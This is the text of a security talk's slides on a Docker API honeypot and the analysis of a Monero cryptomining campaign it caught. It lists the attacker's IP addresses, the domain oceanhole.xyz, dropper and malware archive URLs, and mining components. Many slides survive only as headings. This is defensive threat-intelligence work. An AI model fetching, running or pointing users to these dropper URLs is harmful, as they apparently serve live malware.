Honeypot and Malware Hunting

Florian Charbonneau - HACK2G2

Whoami

http://www.aperikube.fr

https://twitter.com/DrStache_

Florian Charbonneau - HACK2G2

Overview

Florian Charbonneau - HACK2G2

  • Honeypot
  • Docker API
  • HoneyDock
  • Stats
  • Malware Analysis
  • Malware Infrastructure
  • Campaign Evolution

Honeypot

Florian Charbonneau - HACK2G2

Honeypot

Florian Charbonneau - HACK2G2

Low interaction

Pros:

  • Easy to deploy

  • Service or system emulation

  • Easy to monitor

Cons:

  • Attacks are limited

  • Easily detectable

  • Restricted IOC

Honeypot

Florian Charbonneau - HACK2G2

High interaction

Pros:

  • Detection of advanced events and new exploits

  • Highly customizable

  • Difficult to detect by an attacker

  • Rich IOC

Cons:

  • Risky

  • Complex implementation

  • Need for an architecture

Honeypot

Florian Charbonneau - HACK2G2

De l'intérêt du Honeypot - Arnaud Zobec

Docker API

Florian Charbonneau - HACK2G2

Docker API

Florian Charbonneau - HACK2G2

Docker API

Florian Charbonneau - HACK2G2

Docker API

Florian Charbonneau - HACK2G2

HoneyDock

Florian Charbonneau - HACK2G2

HoneyDock

Florian Charbonneau - HACK2G2

  • Python using Flask
  • 40 lignes
  • Implemented endpoints
    • _ping
    • version
    • info
    • containers/json
    • containers/create
    • images/create

HoneyDock

Florian Charbonneau - HACK2G2

HoneyDock

Florian Charbonneau - HACK2G2

HoneyDock

Florian Charbonneau - HACK2G2

  • Simple and fast to make
  • Easily spoted
  • Low interaction

HoneyDock

Florian Charbonneau - HACK2G2

Stats

2018 Nov 8 - 2019 Jan 24

(78 days)

Florian Charbonneau - HACK2G2

Stats

Florian Charbonneau - HACK2G2

  • 14 000 requests by 165 IP
  • ~1 request/min
  • Images
    • strm/xmrig
    • bitnn/alpine-xmrig
    • kannix/monero-miner
    • arayan/monero-miner
    • busybox
    • alpine
    • centos
    • ubuntu

Stats

Florian Charbonneau - HACK2G2

  • kannix/monero-miner : 10M
  • bitnn/alpine-xmrig : 100k
  • strm/xmrig : 50k
  • arayan/monero-miner : 10k

Stats

Florian Charbonneau - HACK2G2

Malware Analysis

Florian Charbonneau - HACK2G2

Log Analysis

Florian Charbonneau - HACK2G2

Log Analysis

Florian Charbonneau - HACK2G2

  • IP : 45.77.140.98
  • DN : oceanhole.xyz
  • Dropper : https://oceanhole.xyz/d

Dropper

Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d

Environement Setup

Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d3

Environment Setup

Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d3

Environment Setup

Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d3

Environment Setup

Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d3

Environment Setup

Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/d3

Malware Analysis

Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/xg.n.tgz

  • .cf
  • b
  • kernelupd
  • xg

Malware Analysis

Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/xg.n.tgz#.cf

 

xmrigCC

Malware Analysis

Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/xg.n.tgz#b

Malware Analysis

Florian Charbonneau - HACK2G2

https://www.oceanhole.xyz/xg.n.tgz#kernelupd

Malware Infrastructure

Florian Charbonneau - HACK2G2

Florian Charbonneau - HACK2G2

Infrastructure

  • oceanhole.xyz

  • vpn.oceanhole.xyz

  • host.oceanhole.xyz

Florian Charbonneau - HACK2G2

oceanhole.xyz

  • Domain Registered On 2018 Oct 03
  • IP : 185.10.68.35
  • Reverse DNS : 35.68.10.185.ro.ovo.sc (https://cock.li)
  • DNS CNAME:
    • wback.oceanhole.xyz
    • ipv4.oceanhole.xyz
    • www.oceanhole.xyz

Florian Charbonneau - HACK2G2

oceanhole.xyz

  • 22 : SSH
  • 80/443 : HTTP(S)
  • 3344 : HTTPS (xmrCC Dashboard)

Florian Charbonneau - HACK2G2

oceanhole.xyz:443

  • Malware distribution (Virus Total)
  • Config files : Docker, SSH Key...
  • XMR Miner (xmrigCC)
  • Web Miner (crypto-loot.com)

Florian Charbonneau - HACK2G2

oceanhole.xyz:443

Florian Charbonneau - HACK2G2

oceanhole.xyz

Florian Charbonneau - HACK2G2

vpn.oceanhole.xyz

  • IP : 45.77.140.98
  • The attacking machine
  • 22 : SSH

Florian Charbonneau - HACK2G2

vpn.oceanhole.xyz

Florian Charbonneau - HACK2G2

host.oceanhole.xyz

  • IP : 104.238.190.35
  • DNS CNAME : eu.proxy.oceanhole.xyz

Florian Charbonneau - HACK2G2

host.oceanhole.xyz

  • 80 : xmr-node-proxy

  • 40929 : SSH

Florian Charbonneau - HACK2G2

host.oceanhole.xyz

Florian Charbonneau - HACK2G2

Infrastructure

Florian Charbonneau - HACK2G2

Campaign Evolution

Florian Charbonneau - HACK2G2

Campaign Evolution

Florian Charbonneau - HACK2G2

Campaign Evolution

Florian Charbonneau - HACK2G2

Campaign Evolution

Florian Charbonneau - HACK2G2

Campaign Evolution

Florian Charbonneau - HACK2G2

Other Research

Florian Charbonneau - HACK2G2

Tools

  • Crt.sh
  • Amass
  • VirusTotal
  • Urlscan.io
  • Onyphe.io
  • Shodan.io

Florian Charbonneau - HACK2G2

Thanks

Questions?

HACK2G2 | Honeypot and Malware Hunting

By Florian Charbonneau

Create a presentation like this

HACK2G2 | Honeypot and Malware Hunting

Présentation 30/01/2019

  • 58
Loading comments...

More from Florian Charbonneau